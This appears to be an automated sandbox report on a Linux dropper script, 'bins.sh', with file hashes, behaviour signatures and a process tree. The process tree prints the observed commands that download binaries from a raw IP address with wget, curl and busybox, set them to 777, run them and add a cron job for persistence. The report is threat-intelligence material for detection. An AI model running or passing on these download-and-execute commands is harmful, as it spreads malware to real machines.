Analysis

  • max time kernel
    149s
  • max time network
    179s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    09-11-2024 15:42

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    aea24efa7797a187bea2466ccf0a14f6

  • SHA1

    c8d1d5d93b70c8de6098941ba438058be2d26403

  • SHA256

    9b07515ab2261e313dfe889834a1d3e657eac7132cc863d56050ecdd9a36e25e

  • SHA512

    b4e53ccc6bb5387f2a0cf1429e8e6ca8703f0f437c82026ddabe93d4537b70b2ee338a087dfc83f18b534a471029a4396a57955b45ce9f95f4e7139d7dcc7868

  • SSDEEP

    192:v/E/Q/Iz/zUoVb57XGSC7jd9lpX/IoJJBF/E/Q/Iz/z1balpX/IoLGSC7jG:vM4kwon7XGSC7jd9lpvIoJNM4k8lpvIm

Malware Config

Signatures

  • Contacts a large (2188) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTPs 3 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 3 IoCs
  • Renames itself 1 IoCs
  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Checks CPU configuration 1 TTPs 3 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 9 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:646
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:648
        • /usr/bin/wget
          wget http://216.126.231.240/bins/PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW
          2⤵
          • Writes file to tmp directory
          PID:654
        • /usr/bin/curl
          curl -O http://216.126.231.240/bins/PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW
          2⤵
          • Checks CPU configuration
          • Reads runtime system information
          • Writes file to tmp directory
          PID:675
        • /bin/busybox
          /bin/busybox wget http://216.126.231.240/bins/PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW
          2⤵
          • Writes file to tmp directory
          PID:682
        • /bin/chmod
          chmod 777 PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW
          2⤵
          • File and Directory Permissions Modification
          PID:696
        • /tmp/PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW
          ./PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW
          2⤵
          • Executes dropped EXE
          PID:697
        • /bin/rm
          rm PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW
          2⤵
            PID:699
          • /usr/bin/wget
            wget http://216.126.231.240/bins/RRNb6V64LVMOv5G3j2Wlb81iwAiY1fLUci
            2⤵
            • Writes file to tmp directory
            PID:701
          • /usr/bin/curl
            curl -O http://216.126.231.240/bins/RRNb6V64LVMOv5G3j2Wlb81iwAiY1fLUci
            2⤵
            • Checks CPU configuration
            • Writes file to tmp directory
            PID:721
          • /bin/busybox
            /bin/busybox wget http://216.126.231.240/bins/RRNb6V64LVMOv5G3j2Wlb81iwAiY1fLUci
            2⤵
            • Writes file to tmp directory
            PID:731
          • /bin/chmod
            chmod 777 RRNb6V64LVMOv5G3j2Wlb81iwAiY1fLUci
            2⤵
            • File and Directory Permissions Modification
            PID:732
          • /tmp/RRNb6V64LVMOv5G3j2Wlb81iwAiY1fLUci
            ./RRNb6V64LVMOv5G3j2Wlb81iwAiY1fLUci
            2⤵
            • Executes dropped EXE
            PID:733
          • /bin/rm
            rm RRNb6V64LVMOv5G3j2Wlb81iwAiY1fLUci
            2⤵
              PID:735
            • /usr/bin/wget
              wget http://216.126.231.240/bins/lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5
              2⤵
              • Writes file to tmp directory
              PID:736
            • /usr/bin/curl
              curl -O http://216.126.231.240/bins/lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5
              2⤵
              • Checks CPU configuration
              • Writes file to tmp directory
              PID:749
            • /bin/busybox
              /bin/busybox wget http://216.126.231.240/bins/lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5
              2⤵
              • Writes file to tmp directory
              PID:762
            • /bin/chmod
              chmod 777 lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5
              2⤵
              • File and Directory Permissions Modification
              PID:769
            • /tmp/lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5
              ./lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5
              2⤵
              • Executes dropped EXE
              • Renames itself
              • Reads runtime system information
              PID:770
              • /bin/sh
                sh -c "crontab -l"
                3⤵
                  PID:772
                  • /usr/bin/crontab
                    crontab -l
                    4⤵
                      PID:773
                  • /bin/sh
                    sh -c "crontab -"
                    3⤵
                      PID:774
                      • /usr/bin/crontab
                        crontab -
                        4⤵
                        • Creates/modifies Cron job
                        • Reads runtime system information
                        PID:775
                  • /bin/rm
                    rm lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5
                    2⤵
                      PID:777
                    • /usr/bin/wget
                      wget http://216.126.231.240/bins/2BkcRt9likIjRh8QY2MQF6uprmyKtaXkDW
                      2⤵
                        PID:780

                    Network

                    MITRE ATT&CK Enterprise v15

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • /tmp/PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW

                      Filesize

                      112KB

                      MD5

                      05d7857dcead18bbd86d2935f591873c

                      SHA1

                      34d18f41ef35f93d5364ce3e24d74730a4e91985

                      SHA256

                      2cb1fa4742268fb0196613aee7a39a08a0707b3ef8853280d5060c44f3650d70

                      SHA512

                      d1793861067758a064ac1d59c80c78f9cb4b64dd680ab4a62dd050156dc0318dde590c7b44c1184c9ee926f73c3fc242662e42645faab6685ecef9d238d2e53e

                    • /tmp/RRNb6V64LVMOv5G3j2Wlb81iwAiY1fLUci

                      Filesize

                      98KB

                      MD5

                      5141342d0df8699fa32a6b066a0c592e

                      SHA1

                      8157673225bd5182f16215e2aa823a25ca2d4fbc

                      SHA256

                      54302d130cd356fb19ea5a763c5ab6b0892fc234118f10ba3196ec4245c83b4d

                      SHA512

                      d6b24571e7691227abafc70133a1da007c97c2730c820de77a750d2c140a8a75554cc614b4729debc4ec5480124252737c5846a458a5146005285c6d3f9e3801

                    • /tmp/lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5

                      Filesize

                      141KB

                      MD5

                      3ca8decdb1e52c423c521bfff02ac200

                      SHA1

                      8621ecd6807109b8541912ad9e134f6fb49bfd48

                      SHA256

                      dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f

                      SHA512

                      b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a

                    • /var/spool/cron/crontabs/tmp.yfyb4c

                      Filesize

                      210B

                      MD5

                      9f1cb7324a266f4df76521a2de82caed

                      SHA1

                      1fc5d8381dbf4976ef5b0ee4a461f01e89dd7b07

                      SHA256

                      a3c65f24b086da59d0c7f12879d40b6fa7e27e86b75f374956d4b721ca4dba38

                      SHA512

                      b2efc144732f635314de1dc79e75cea6760b1fb6592a4fae98e8362d694ebab72f0002f9d65d3f523fc2504b9a3e50bbe03919b962066d542b21c9957ba087f4